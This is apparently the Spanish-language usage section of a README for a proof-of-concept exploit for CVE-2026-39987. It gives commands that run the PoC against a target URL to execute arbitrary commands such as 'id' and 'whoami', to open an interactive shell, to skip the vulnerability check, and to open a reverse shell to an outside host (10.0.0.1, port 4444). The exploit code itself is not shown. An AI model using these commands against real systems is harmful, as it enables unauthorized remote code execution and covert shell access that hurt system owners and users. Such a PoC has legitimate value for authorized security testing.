# Instalar dependencias pip install -r requirements.txt # Ejecutar un comando python CVE-2026-39987_PoC.py http://target.com:8080 "id" # Modo interactivo (shell) python CVE-2026-39987_PoC.py http://target.com:8080 -i # Reverse shell python CVE-2026-39987_PoC.py http://target.com:8080 --revshell 10.0.0.1 4444 # Saltar verificación python CVE-2026-39987_PoC.py http://target.com:8080 "whoami" --no-check